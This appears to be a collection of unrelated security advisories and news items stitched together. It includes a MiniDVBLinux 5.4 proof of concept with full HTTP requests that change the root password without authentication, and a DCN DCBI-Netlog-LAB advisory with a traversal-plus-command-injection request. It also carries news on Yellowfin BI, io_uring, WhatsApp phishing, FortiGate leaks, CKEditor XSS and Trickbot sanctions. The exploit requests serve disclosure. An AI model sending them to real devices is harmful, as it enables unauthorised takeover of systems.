MiniDVBLinux versions 5.4 and below root password changing proof of concept exploit.

    MiniDVBLinux 5.4 Change Root Password PoCVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application allows a remote attacker to change the rootpassword of the system without authentication (disabled by default)and verification of previously assigned credential. Command executionalso possible using several POST parameters.Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5715Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php24.09.2022--Default root password: mld500Change system password:-----------------------POST /?site=setup&section=System HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6Cache-Control: max-age=0Connection: keep-aliveContent-Length: 778Content-Type: application/x-www-form-urlencodedCookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfbaHost: ip:8008Origin: http://ip:8008Referer: http://ip:8008/?site=setup&section=SystemUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-gpc: 1APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+Pretty post data:APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: r00tBUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/KumanovoKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: SYSTEM_PASSWORD Eenable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1WEBIF_PASSWORD_CHECK: 1action: saveparams: changed: WEBIF_PASSWORD_CHECK Disable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: WEBIF_PASSWORD_CHECK

MiniDVBLinux 5.4 Change Root Password

Pre- and post-auth path to pwnage

A trio of authentication bypass bugs stemming from the use of hardcoded keys have been patched in popular enterprise analytics platform Yellowfin BI.

After uncovering the pre-authentication vulnerabilities, security researchers from Assetnote then found a post-authentication path to command execution.

The flaws, which were discovered by Assetnote’s Max Garrett, have been assigned CVE numbers but not, as yet, CVSS scores.

**Bypasses**

The issues were discovered via instances of authentication logic as indicated by .

One authentication bypass (CVE-2022-47884) arose because contained “logic where allowed us to sign in as any user, as long as a signature check was passed”, according to a blog post published by Garrett and Assetnote CTO and co-founder Shubham Shah yesterday (January 24). The hardcoded private RSA key meant anyone could pass the signature check.

A second bypass, found in the JsAPI servlet, meant attackers could authenticate through the EXTAPI-IPID cookie, which was AES-encrypted using the hardcoded key’s user id (CVE-2022-47885).

“So it is possible for anyone who knows the victim’s user id to create a valid session as their account,” explained the blog post.

Read more of the latest enterprise security news

The third and final bypass (CVE-2022-47882) centered on Yellowfin’s suboptimal implementation of JWTs inside the REST API.

A valid refresh token id and extracted hardcoded key enabled the creation of a valid JWT as any user, although the impact was limited to privilege escalation given the need for a valid refresh token ID generated from a successful login.

Having performed an authentication bypass, a fourth bug – CVE-2022-47883 – then enabled attackers to perform remote code execution (RCE).

Noting Yellowfin BI’s connection to arbitrary data sources to pull data into the application, the researchers investigated whether JNDI or JDBC injections might enable command execution – and the JNDI mechanism, by using the gadget, duly proved fruitful.

Assetnote has published the full proof-of-concept exploit chain on GitHub.

The vulnerabilities have been patched in Yellowfin BI 9.8.1.

**Monolith application advice**

“In our assessment of enterprise applications, we often find hardcoded keys that lead to significant security impact (for example, our bug in VMWare AirWatch),” Shah told The Daily Swig. “Many enterprise products can be difficult to obtain due to qualification and sales processes. However once the source code has been obtained, there are often many critical vulnerabilities that can be exploited readily and easily.”

Yellowfin is a Java monolith application, and Shah and Garrett offered methodological advice to other security researchers hunting in similar codebases: “Map out the pre-authentication attack surface in as much detail as possible,” they said.

“Understand all of the routes, both static and dynamic, and then determine which portion of these routes are actually accessible without any authentication.”

After mapping pre-authentication routes, “determine how user input is processed by these routes and understand which routes take in what user input”, they continued. This will uncover issues warranting further investigation “simply based off the names of the controllers or parameters”.

YOU MIGHT ALSO LIKE AWS patches bypass bug in CloudTrail API monitoring tool

Yellowfin tackles auth bypass bug trio that opened door to RCE

An issue in the component /network_config/nsg_masq.cgi of DCN (Digital China Networks) DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.

**Information**

**Vendor of the products:**    Digital China Networks

**Vendor's website:**

https://www.dcnglobal.com (Global)

https://www.dcnetworks.com.cn (China)

**Reported by:**    WangJincheng(wjcwinmt@outlook.com)

**Affected products:** DCN (Digital China Networks) DCBI-Netlog-LAB

**Affected system version:** V1.0

**Product page:** https://www.dcnetworks.com.cn/goods/58.html

**Overview**

DCN (Digital China Networks) DCBI-Netlog-LAB is an online behavior log system. DCN (Digital China Networks) DCBI-Netlog-LAB V1.0 was detected with authentication bypass vulnerability and command injection vulnerability. An unauthenticated attacker can send crafted requests to bypass authentication through directory traversal, and inject arbitrary malicious commands into seven fields proto, ip, pport, p_dip, pdport, odev, and tport. Successful exploits could allow the attacker to execute arbitrary commands in remote systems.

**Vulnerability details**

The vulnerability was detected in the **/usr/local/lyx/lyxcenter/web/cgi-bin/network_config/nsg_masq.cgi** binary.

**Authentication bypass vulnerability**

In the sub_805534E function, user authentication is performed.

In the sub_8059C00 function, the __xstat function is used to check whether the /tmp/admincache/{user_name}/{session_id} path exists. If it does, the authentication check is passed.

The following figure shows the session value when the user name is admin.

Therefore, we can set user_name to admin and write ../ in session_id, points to the upper-layer directory, causing **directory traversal**. In this way, we can bypass this authentication, gain administrator privileges, and continue to exploit the following command injection vulnerability.

**Command injection vulnerability**

When the act field is 2 or 3, the sub_8049D50 function is called.

In the sub_8049D50 function, the contents of the proto, ip, pport, p_dip, pdport, odev, and tport fields are concatenated into the command string without any filtering.

Finally, whether the act field is 2 (that is, a1 is 1) or 3 (that is, a1 is 0), the popen function is called with the command string executed as an argument.

To sum up, an unauthenticated attacker can bypass authentication through directory traversal, and then make act 2 or 3, and inject arbitrary malicious commands into seven fields such as proto, thus gaining control of the remote systems.

**Poc**

For example, send the following message by the GET request.

    GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;ls>/usr/local/lyx/lyxcenter/web/hack_result.html; HTTP/1.1
    Host: 192.168.5.254
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    X-Forwarded-For: 8.8.8.8
    Connection: close
    

The above request message is just a demonstration. In addition, you can set act to 2 or 3 and inject arbitrary malicious commands into seven fields proto, ip, pport, p_dip, pdport, odev, and tport.

**Attack Demo**

Before the attack, no /hack_result.html page exists.

Follow the POC above to make the request.

After the attack, visit /hack_result.html again, you can see hack_result.html has been successfully created, and written to the results of the ls command to explain that the command ls>/usr/local/lyx/lyxcenter/web/hack_result.html we injected has been executed successfully.

CVE-2023-26802: my-vuls/DCN DCBI-Netlog-LAB at main · winmt/my-vuls

In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Fri, 22 Apr 2022 02:43:27 +0200
From: David Bouman <dbouman03@...il.com>
To: oss-security@...ts.openwall.com
Subject: Linux: UaF due to concurrency issue in io\_uring timeouts

Hello list,

We (Jayden Rivers and David Bouman) are disclosing a bug we found in the 
Linux kernel's io\_uring subsystem. We have written a local privilege 
escalation PoC that can successfully elevate to system root from an 
unprivileged process (in a container). We will be releasing a blog post 
(including exploit code) in a week or two. It should be noted that 
unlike many Linux vulnerabilities that have surfaced recently, 
triggering this one does not require an attacker to have any kind of 
privileges (e.g. in a user namespace). This leaves many systems vulnerable.

We are still looking for a CNA representative that can assign a CVE 
number for this vulnerability; please contact us!

Kernel versions 5.10+ are affected, and linux-stable patches are already 
pushed. The upstream patch commit is 
e677edbcabee849bfdd43f1602bccbecf736a646 ("io\_uring: fix race between 
timeout flush and removal").

When the IORING\_OP\_TIMEOUT (T) and IORING\_OP\_LINK\_TIMEOUT (LT) opcodes 
are combined in a linked submission queue entry, and another request (B) 
finishes, a race might occur: namely, when due to the completion of B, T 
is cancelled (through the completion event count), and LT is canceled by 
its hrtimer at the same time. Whilst T is still being cleaned up, LT is 
already freed by a different execution context, and since they are 
linked, the cleanup of T retains a dangling reference to the now-freed 
LT. Hence, there's a use-after-free.

Exploitation-wise, the attacker can reallocate LT to another \`struct 
io\_kiocb\` and defer the UaF to e.g. a \`struct file\` (this is the 
technique we will describe in aforementioned blog post).

The race window is quite tight and the scenario is complicated, so the 
race can only be won very infrequently in our experience.

It is advised to upgrade your kernel to latest ASAP.

Greetings,

Jayden Rivers & David Bouman

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-29582: security - Linux: UaF due to concurrency issue in io_uring timeouts

A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members...

A cybercriminal campaign linked to Russia is deploying QR codes to access the WhatsApp accounts of high-profile targets like journalists, members of think tanks, and employees of non-governmental organizations (NGOs), according to new details revealed by Microsoft.

The group, which Microsoft tracks by the name “Star Blizzard,” is also referred to as Coldriver by other researchers. Last year, the group created impersonation accounts where members posed as experts in a field that their targets might be interested in—or that was somehow affiliated with the target. Once a relationship had been established, the target would receive a phishing link or a document that contained a phishing link.

But over time, that tactic became widely known, and part of the cybercriminals’ infrastructure was taken down. Now, it seems the group has changed tactics and is sending QR codes instead of malicious links to the targets that they have established an initial relationship with.

These QR codes do not take the target to a malicious website, nor will they join them to the promised WhatsApp group on “the latest non-governmental initiatives aimed at supporting Ukraine NGOs,” as is claimed in one of the cybercriminal lures.

In reality, the link in the QR code is intentionally broken. The idea is that the target will respond with a remark about the broken link. When that happens the cybercriminals send out a shortened URL to a website that displays another QR code.

_Screenshot courtesy of Microsoft_

> “I apologize for the inconvenience with the QR code. Kindly try this alternative link: US-Ukraine NGOs Group  
> It should work without any issues.

By scanning this QR code and following the instructions on the website they confirm the addition of an extra device to the WhatsApp account of the target. With that access the group can read the messages in their WhatsApp account and use existing browser plugins, particularly those designed for exporting WhatsApp messages from an account accessed via WhatsApp Web.

**How to stay safe**

These spear phishing campaigns are highly targeted and you’ll probably never see an invite to this group. But cybercriminals tend to copy ideas that work, so you may see them in another form.

There are a few simple rules that will help you avoid this kind of phishing.

*   Always hover over links before clicking them.
*   When you find a shortened URL, think about the possible reason for shortening. Was there a real need to do this or is it just meant to hide the destination?
*   When still in doubt, unshorten the URL.
*   When following instructions on a website, scrutinize whether the prompts on your device actually match the expected ones. WhatsApp will double-check whether you want to add a device to the account.
*   Double-check whether the sender is who they claim to be through another method of contact.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 WhatsApp spear phishing campaign uses QR codes to add device 

FortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn…

FortiGate firewall leak exposes 15,000+ configurations, impacting organizations globally. The actor behind the leak is Belsen Group. Learn how to mitigate risks and protect your systems.

A new leak from a threat actor group dubbed Belsen Group or (Belsen\_Group) has exposed configurations from over 15,000 **FortiGate firewalls**, threatening organizations that use these devices, as it could allow attackers to gain access to sensitive systems and bypass defences. The US, UK, Poland, and Belgium have the highest number of victims, followed by France, Spain, Malaysia, Netherlands, Thailand, and Saudi Arabia.

Research by CloudSEK’s contextual AI digital risk platform XVigil **reveals** that in 2022, the Belsen Group breached a zero-day vulnerability, leaking over 15,000 Fortigate firewall configurations. The leaked information includes usernames, passwords (some in plain text), device management digital certificates, and all firewall rules. This data gives attackers a treasure trove of information that they can exploit. 

Belsen Group on Breach Forums and its dark web leak site (Screenshot Hackread.com)

Exposed usernames and passwords, especially those in plain text, can be used by attackers to directly access sensitive systems on your network. Even if you patched the vulnerability (**CVE-2022-40684)** in 2022, it is crucial to check for signs of compromise since this was a zero-day exploit. Leaked firewall configurations reveal your internal network structure, potentially allowing attackers to identify weaknesses and bypass security measures.

Breached digital certificates could allow unauthorized access to devices or impersonation during secure communications. What’s even more concerning is that organizations that patched the vulnerability after the initial disclosure in 2022 might still be at risk if attackers gained access before the patch was applied.

****Belsen Group’s Motives and History****

While the Belsen Group appears to be new on the hacking forum scene, the leaked data suggests they’ve been around for at least three years. Researchers believe they were likely part of a group that exploited a zero-day vulnerability (CVE-2022-40684) in FortiGate firewalls in 2022. After potentially using or selling the access gained through the exploit, they’ve now resorted to leaking the data in 2025.

To mitigate risks arising from such leaks, it is essential to update all device and VPN credentials, especially those listed in the leaked data, and implement strong passwords. Audit and reconfigure firewalls to identify vulnerabilities and tighten access controls. Rotate compromised digital certificates to ensure secure communication.

Additionally, determine the timeline for patching CVE-2022-40684 in your organization, conduct forensic analysis on compromised devices, and monitor your network for unusual activity. These steps will help protect your network and reduce potential risks.

CloudSEK has created a useful resource for organizations to check if any network is part of the exposed IPs after analysing data, which is available **here**.

1.  **UNC5820 Exploits FortiManager Zero-Day Vulnerability**
2.  **CISA and Fortinet Warns of New FortiOS Zero-Day Flaws**
3.  **Hackers Exploiting 0-day Vulnerability in Fortinet Products**
4.  **Hackers leak login credentials of vulnerable Fortinet SSL VPNs**
5.  **Hackers dump login credentials of Fortinet VPN users in plain-text**

Belsen Group Leaks 15,000+ FortiGate Firewall Configurations

CVE-2020-19766

CodeLathe FileCloud before 20.2.0.11915 allows username enumeration.

CVE-2020-26524: FileCloud Release Notes

A cross-site scripting (XSS) vulnerability in the WSC plugin through 5.5.7.5 for CKEditor 4 allows remote attackers to run arbitrary web script inside an IFRAME element by injecting a crafted HTML element into the editor.

 by  &  . Posted on 2020-03-05

We are happy to announce the release of CKEditor 4.14 that contains new features, bug fixes, and API improvements. Most notably, this WYSIWYG editor version introduces support for pasting from LibreOffice. It also includes security fixes for the HTML data processor and the WebSpellChecker Dialog plugin, so an upgrade is highly recommended.

**# Paste from LibreOffice Writer**

CKEditor 4 is famous for its best-in-class support for pasting content from Word, Excel and Google Docs. The Paste from LibreOffice plugin lets you copy your content from LibreOffice Writer, clean up the resulting source HTML, and add it to your WYSIWYG editor content. What is extremely important, though, is that CKEditor 4 lets you preserve the author’s intentions by retaining the original structure and formatting, and adjusting it to the styles you are using in your editor.

 CKEditor 4 WYSIWYG editor with support for pasting from LibreOffice.

You can read more about this feature in the documentation and try out the Paste from LibreOffice sample. This feature is available by default in the Standard and Full editor presets.

**# Security issues fixed**

CKEditor 4.14 fixes an XSS vulnerability in the HTML data processor reported by Michał Bentkowski of Securitum. The vulnerability stemmed from the fact that it was possible to execute XSS inside CKEditor after persuading the victim to: (i) switch CKEditor to source mode, then (ii) paste a specially crafted HTML code, prepared by the attacker, into the opened CKEditor source area, and (iii) switch back to WYSIWYG mode or (i) copy the specially crafted HTML code, prepared by the attacker and (ii) paste it into CKEditor in WYSIWYG mode. Although this is an unlikely scenario, we recommend upgrading to the latest editor version.

This editor release also fixes an XSS vulnerability in the third-party WebSpellChecker Dialog plugin that is included in the Standard and Full presets of CKEditor 4. The vulnerability was reported by Pham Van Khanh from Viettel Cyber Security and was present in plugin versions up to 5.5.7.5. It is related to the specific internals of the plugin, where it was possible to execute XSS after persuading the victim to: (i) switch CKEditor to source mode, then (ii) paste a specially crafted HTML code, prepared by the attacker, into the opened CKEditor source area, then (iii) switch back to WYSIWYG mode, and (iv) preview the CKEditor content outside of the CKEditor editable area on a page where the WebSpellChecker Dialog plugin files are available. Please note that this is a highly unlikely scenario as it requires a few very specific conditions to be present. Still, upgrading to the latest CKEditor 4 version is recommended.

**# Print and preview improvements**

If you rely on writing your documents in CKEditor 4 and then printing them, you will be happy to learn that we have significantly improved this aspect of the editor functionality. We have recently noticed that some of the fake objects that are used in the WYSIWYG editor to symbolize various rich content elements, such as page breaks, anchors or iframe placeholders, were actually output in the print in their symbolic form. We have thus revamped the Preview and Print plugins to fix this and to make them much more useful.

We are happy to share that thanks to the new implementation you will also be able to add the print functionality to inline editors!

**# Other improvements**

Here are some other important enhancements that were added in this release:

*   The active dialog tab now has the aria-selected="true" attribute to improve accessibility.
*   The color button state was improved to reflect the selected editor content color.
*   The Font plugin no longer creates nested <span> elements when reapplying the same font multiple times.
*   The emoji suggestion box now shows the matched emoji name instead of the ID.
*   We introduced significant Widget plugin improvements related to selection containing multiple widgets and widget partial selection in the context of copy-paste and drag&drop operations. This change positively affects all widget-based plugins, including Easy Image, Enhanced Image, Media Embed and Code Snippet.

**# WYSIWYG editor Vue.js integration**

We are also happy to report that the beta release of the official CKEditor 4 WYSIWYG editor Vue.js integration has recently been published. You can read more about it the documentation as well as try out some samples.

This integration complements similar CKEditor 4 WYSIWYG editor integrations for React and Angular. We are looking forward to hearing what other frameworks we should support with a native CKEditor 4 WYSIWYG editor integration.

 **# API changes and improvements**

Based on community feedback and best practices in web development, we always try to modernize the CKEditor 4 API to make working with it a pleasure for any developer. As a result, in this release, we have introduced some API improvements:

*   Introduced the CKEDITOR.ui.richCombo.select() method allowing for easy control of rich combo editor toolbar elements.
*   Introduced the textColor and bgColor editor commands in the Color Button plugin that allow for applying the selected color for the current editor selection.
*   Introduced the font and fontSize editor commands in the Font plugin that allow for applying the selected font style for the current editor selection.
*   Introduced the editor.getSelectedRanges() alias for smoother work with the editor selection API.
*   Introduced an API for dynamically refreshing widget mask and parts properties, allowing for an easier integration with widgets with dynamic content.

**# Release notes**

Check out the release notes and contact us for more information.

**# Download**

Download CKEditor now and upgrade your installation or use your favorite package manager to install it!

**# License**

CKEditor is available under Open Source and Commercial licenses. Full details can be found on our license page.

**# Reporting issues and contributing**

Please report any new issues in the CKEditor 4 development repository and follow the instructions in the issue template. You can also contribute code and provide editor patches through pull requests.

**# Support**

Community support is available through Stack Overflow. Visit the resources page for additional options.

CVE-2020-9440: CKEditor 4.14 with Paste from LibreOffice released

Authorities have sanctioned 11 alleged members of the cybercriminal groups, while the US Justice Department unsealed three federal indictments against nine people accused of being members.

The United States Department of Treasury and United Kingdom Foreign Office announced today that they have sanctioned 11 people for their alleged involvement in the Trickbot cybercriminal gang. The US Department of Justice also unsealed indictments against nine people whom it says are connected to Trickbot and its sibling organization Conti. Seven of those nine also appear on today's sanctions list.

US and UK law enforcement working with officials around the world have made a concerted effort in recent years to deter cybercrime—particularly ransomware attacks and those launched by Russia-based actors. And Trickbot, a notorious and prolific gang, has repeatedly been a specific target of these actions. In February, the US and UK announced sanctions against seven alleged Trickbot actors and an indictment against them.

The new round of censures includes alleged Trickbot members who are accused of acting as coders and administrators for the group, as well as senior staff, the developer team lead, and a human resources and finance manager. The sanctions also name Trickbot's alleged head of testing for the gang's malware and technical infrastructure. This individual, Maksim Galochkin, goes by the handle Bentley, among others. WIRED identified Galochkin last week as part of an extensive investigation into Trickbot and its operations. 

The Department of Justice announced three indictments today that include Galochkin. One in the Northern District of Ohio, filed on June 15, charges him and 10 other alleged Trickbot members with “conspiring to use the Trickbot malware to steal money and personal and confidential information from unsuspecting victims, including businesses and financial institutions located in the United States and around the world, beginning in November 2015.” This timeline means that the charges essentially relate to all Trickbot activity going back to the group's inception. 

An indictment from the Middle District of Tennessee, filed on June 12, charges Galochkin and three others with use of the Conti ransomware in attacks targeting “businesses, nonprofits, and governments in the United States” between 2020 and June 2022. And an indictment in the Southern District of California, filed on June 14, charges Galochkin in connection with the May 1, 2021, Conti ransomware attack on Scripps Health.

“Today’s announcement shows our ongoing commitment to bringing the most heinous cyber criminals to justice—those who have devoted themselves to inflicting harm on the American public, our hospitals, schools, and businesses,” FBI director Christopher Wray said in a statement on Thursday. “Cyber criminals know that we will use every lawful tool at our disposal to identify them, tirelessly pursue them, and disrupt their criminal activity. We, alongside our federal and international partners, will continue to impose costs through joint operations no matter where these criminals may attempt to hide.”

It has been difficult for global law enforcement to make progress on deterring cybercrminal activity, especially when actors are based in countries like Russia that allow them to operate with impunity. But independent researchers say that imposing public accountability does have impacts on the individuals as well as the broader criminal landscape.

Cybercriminals “often think they can conduct cyberattacks against corporations and individuals under anonymity,” says Landon Winkelvoss, vice president of research for the digital intelligence firm Nisos, which conducted a detailed investigation of Bentley's real-world identity at WIRED's request. But “they all make mistakes and the very nature of their crimes requires that their digital footprint is in the wild."

Winkelvoss notes that while cybercriminals have systematized strategies for maintaining their operational security and staying out of the limelight, their efforts to remain invisible are far from foolproof.

“Reusing command and control infrastructure servers and selectors like emails addresses and phone numbers is often the quickest return on their investment,” Winkelvoss says. "Unfortunately for them, this makes their unmasking relatively straightforward, especially when law enforcement and private industry \[have\] more publicly available data than they do.”

Search

lenovo warranty check/lookup | check warranty status | lenovo support us